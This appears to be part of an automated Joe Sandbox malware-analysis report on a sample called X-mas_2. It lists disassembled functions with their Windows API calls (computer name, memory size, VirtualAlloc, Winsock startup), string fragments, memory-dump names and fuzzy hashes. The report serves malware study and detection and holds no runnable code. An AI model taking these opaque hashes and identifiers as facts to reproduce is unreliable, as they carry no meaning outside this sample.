Instruction Fuzzy Hash: C3C109B2A083418BD728CF28C8A17AFB7E2AFD5304F19893DD49987351DB389C45CB46

Function 00421060 Relevance: 14.3, Strings: 11, Instructions: 575
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

B, xrefs: 0042132B
V, xrefs: 004212B8
0, xrefs: 0042133F
?, xrefs: 0042133A
!@, xrefs: 00421096
=, xrefs: 00421330
W, xrefs: 004212BD
T, xrefs: 004212C2
,, xrefs: 00421635
1, xrefs: 00421344
@, xrefs: 00421335

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$0$1$=$?$@$B$T$V$W
API String ID: 383220839-2565976686
Opcode ID: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
Instruction ID: bd3356e8815184d6709652c26fefee66f72d067b08eb61c2d628a82e36adc5dc
Opcode Fuzzy Hash: 694c3fec6f08d54430612453bc0ba53508c55e5cebad724f7ac0ec954b199606
Instruction Fuzzy Hash: 3D32E27160C7908FD324CB28D4803AFBBE2ABE5314F58896EE5D5873A1D6B98845CB47

Function 004229CD Relevance: 11.5, APIs: 3, Strings: 3, Instructions: 1008
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"0B, xrefs: 00423016
7x~, xrefs: 004234C1
`*B, xrefs: 00422AAE

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: "0B$7x~$`*B
API String ID: 0-767839351
Opcode ID: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
Instruction ID: 9fd70d4789ae2a743fdbd81f1d1a9eea778115e9b5f68926e692af45083946f2
Opcode Fuzzy Hash: bfd9e8ac35199f97e1d7b9b7a72bdacfbe17c41595a0c7f5bb3de10ab4316b55
Instruction Fuzzy Hash: B4726576A08211CFD714CF68EC817AAB7B2FF89314F09897CE945AB391D7389901CB95

Function 004095A0 Relevance: 9.1, Strings: 7, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t{, xrefs: 004097FF
T, xrefs: 00409675
m, xrefs: 00409613
fg, xrefs: 00409913
A3421A837E03A61920A4C476FD51BCB1, xrefs: 0040964D
96, xrefs: 00409867
ec, xrefs: 004097F7

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 96$A3421A837E03A61920A4C476FD51BCB1$ec$fg$m$t{$T
API String ID: 0-3619835163
Opcode ID: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
Instruction ID: 04ace9e08cfa33f9ed2207d002dc48eeb8774e5e1fc40806eeb0b6624e25d2eb
Opcode Fuzzy Hash: 4f28de017bae56af272f2ebb78918ce2254d3fc1898780eaaedbce328d025c84
Instruction Fuzzy Hash: 41A1E5B01083808BD714DF65C895AABBBE5EBC2318F14896DE0D1DB392D739C909CB56

Function 00408640 Relevance: 7.7, APIs: 5, Instructions: 220
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408664
GetCurrentThreadId.KERNEL32 ref: 0040866E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040874C
GetForegroundWindow.USER32 ref: 00408803
ExitProcess.KERNEL32 ref: 004088E8

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
Instruction ID: cffc6beeb204386c5c3c11e80dbd3dd055112d37bec62ae1e5896589e5666a59
Opcode Fuzzy Hash: 10b0eff6467ca18bcb2542539502c240d5f51aa7d1eb33122d427624a9865ed6
Instruction Fuzzy Hash: 0F613977B447084BD718AFA9CD8635AB6D29B84710F0E813DA594DB3D2ED7CDC009789

Function 0042BE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
Instruction ID: ce2e31214bed253c0b38068d6f273c2badb2212a27c3daf9020c2c42f253850c
Opcode Fuzzy Hash: 4253ba6b8e191a9b3dfd493019a759a11414da6281240eda0209736fa868e564
Instruction Fuzzy Hash: 66C1373160C3908BC725CF2994903AFBFE1AF9A304F5849AED4C9D7352D7798806CB5A

Function 0042C26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
Instruction ID: 4ac38620278a99acf54b81f63bd20ff9ec3c0600e4476075f1787c1a2961d72f
Opcode Fuzzy Hash: 0a1af248bc305b655ffc1925307390703c8d3f98765630551724a65d64f27431
Instruction Fuzzy Hash: 9FA1397160C3908BC725CF2994903EFBBE1AF9B304F58496ED4C997342D7798906CB5A

Function 0042C282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C358

Strings

BVAI, xrefs: 0042C52A

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
Instruction ID: b3ae04337b81b82226eeb8f92f7c3334391f9750b5f809a1d1c02d35e42eb35b
Opcode Fuzzy Hash: e77831ec273681899d33ca959c897361b3e2c49e039e5f7857a3c08ac24816b6
Instruction Fuzzy Hash: E6A1377160C3908BC7258F2994903EFBFE1AF9A304F58496ED4C997352D7798806CB5A

Function 005107A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005107CE
Module32First.KERNEL32(00000000,00000224), ref: 005107EE

Memory Dump Source

Source File: 00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Offset: 00510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_X-mas_2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6242156bb0e4a344276ad774c15caf0d9d8a44050575ee4e72a9f37a2f27b510
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CFF062311017156BE7203AB5A98DAAF7AE8FF49765F101528E642910C0DAF4F8C58A61

Function 00440480 Relevance: 2.8, Strings: 2, Instructions: 345COMMON

Download Yara Rule

Strings

, xrefs: 00440534, 00440570, 00440608
=:;8, xrefs: 004404F4

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: =:;8$
API String ID: 2994545307-3594289699
Opcode ID: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
Instruction ID: c423fdc3fd0ad810bcad91faa20af3043e37e718d9259fa2435a4e627f55f2db
Opcode Fuzzy Hash: 9971fbae55c470a46498d2abe49c779c55fc4cb17bce0a149da73fd2c7f0910c
Instruction Fuzzy Hash: AFA1657AB083104BE724DF64D88066BB7E2EBD5314F19853DDAC297341DA38EC25CB96

Function 00426000 Relevance: 2.8, Strings: 2, Instructions: 286COMMON

Download Yara Rule

Strings

Zysf, xrefs: 004262C0
{ts|, xrefs: 004262A6

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: Zysf${ts|
API String ID: 2994545307-929106683
Opcode ID: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
Instruction ID: d8bc85cb00ae77c9a618740bd9c139a142b3571fb9705fb1d300c60273d40d62
Opcode Fuzzy Hash: 330ee75e3bd9f455a8908d9dc58e8014dd1dde360c5c7ac0f7533fcfcbbb6c79
Instruction Fuzzy Hash: 0F817EB1B083219BD714DF25EC81B3B73A6DBC5314F59843EE58697392E63CAC04839A

Function 0040D6F8 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

A3421A837E03A61920A4C476FD51BCB1, xrefs: 0040D883
]b, xrefs: 0040D787

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: A3421A837E03A61920A4C476FD51BCB1$]b
API String ID: 0-3221557072
Opcode ID: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
Instruction ID: 53dbd2ff0650d5a4b6327cdb9e65b9ca1bffd35d2773582bc8f85aad4ecb8dd8
Opcode Fuzzy Hash: 416f5a0ace6e6ba72c734dbe947573464599ab33d1e233289b3341e2fccb922a
Instruction Fuzzy Hash: A1617977E043904BD320CB26CC517AFBAD2ABD5315F19C93DD8C9E7285DB3849058782

Function 0040C22D Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

yJ[L, xrefs: 0040C26F
uJ[L, xrefs: 0040C23E

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: uJ[L$yJ[L
API String ID: 0-3296124075
Opcode ID: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
Instruction ID: 974635f0455fef9b14944d53f12c23bc89291c5e3f93e9d67168785d5e3144d2
Opcode Fuzzy Hash: 0a5ccc53d7ad34005281885bb5bdc5f0493f34b58fb1c7104cb2bead719577d2
Instruction Fuzzy Hash: EC31E5B2A405019FDB19CF68CC627AE7BE2EB59310F29417DD252E7790DB3999018718

Function 0043D910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004409B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043BCE0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

yPC, xrefs: 0043BDAD

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID: yPC
API String ID: 2994545307-621879255
Opcode ID: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
Instruction ID: e001d4929498538a0a8ecbb7f051c84920bd96f0897afdf19a85230a06394eb9
Opcode Fuzzy Hash: 82ede688b2b155f207d3fe4f7395420d55c6ff92fca177961a2d1e7af1c7a0b5
Instruction Fuzzy Hash: 86617836A082145BE7249E28DC5177BB3A3EBC9710F1E943EDAC597345E6399C0187C5

Function 0043DCE9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

D]+\, xrefs: 0043DD60

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
Instruction ID: 8b969df8764a6140270626732b9a31d532f0956a4ad419ee8c7d181fdb0ffe63
Opcode Fuzzy Hash: 34dca2a2c48cd4858e45e2c56d254a9ae5f171e70086b16834debb71bec6d78b
Instruction Fuzzy Hash: A1314878B482008BE7188F42E99073B73A6E7CE300F29753ED481172C6C2389C129B9E

Function 004384F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
Instruction ID: 87dcadc3cc869a97b24ddec11b738d0474b7b08a840880998656ded9c4dd36b4
Opcode Fuzzy Hash: b869eca833a40c818396ee1e1d5dee7386a155d051680801a2248d55a6fec426
Instruction Fuzzy Hash: F9A1053250C3848FE3049B28895536BFBD29BDA318F29992EF0D557382DABDC545D70B

Function 00418DF1 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
Instruction ID: 4f8d52657f7084f69bf055083d43b99a2f5dee74b0ad81f64ba48cb646f5989a
Opcode Fuzzy Hash: 81659641f48af0cf2b9ea4007cec23b56981737a4bb24a2d2dad75840f1d429d
Instruction Fuzzy Hash: 467148B69043108BD724DF24DC917EB73A2EF85324F09493EE885873A1D73DA841D79A

Function 0043FB80 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
Instruction ID: 6d45d2c3cd36f3333d69d70c7c241f502430d0bdfbc6ce3510ca67b0fea4cfba
Opcode Fuzzy Hash: e6d4e30f96187bd1b78eb7bdb56660af8907fc12caa95b9222812f4f9925037d
Instruction Fuzzy Hash: 2D614875A583015BDB148F18C851B2BB3A2EFDD310F19A43EE986873A5DB34DC15C74A

Function 020E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020E024D

Strings

kernel32.dll, xrefs: 020E008F, 020E0095
cess, xrefs: 020E018D

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: eb0f242f5703443693c8639c26dcadd2eec8494b01d7f8affdc10406fa1bd32a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 57527A75A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54EAB351DB70AA85DF14

Function 0042B842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
Instruction ID: 6cc2bcf1cdf43af400e598cc500c9cf08bcf6da0c1c09473a882a53858423e11
Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56

Function 0042B840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042B875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92

Function 0042B94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54

Strings

bC, xrefs: 0042B992

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96

Function 0042B948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54

Strings

bC, xrefs: 0042B992

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96

Function 0042B7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924

Strings

KHGN, xrefs: 0042B89B

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ComputerName
String ID: KHGN
API String ID: 3545744682-1032087821
Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92

Function 020E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,020E0223,?,?), ref: 020E0E19
SetErrorMode.KERNELBASE(00000000,?,?,020E0223,?,?), ref: 020E0E1E

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1f3fb47f01235a72a762d1c9d8ab3db6e6df8a0f8847510d0ea92dc2c2c9df9a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A7D0123114522877DB413A94DC09BCD7B5CDF05B66F008021FB0DE9180C7B0954046E5

Function 0042DE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042DE5A

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2

Function 004316B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 004316F7

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82

Function 00409CAE Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00409CC6

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
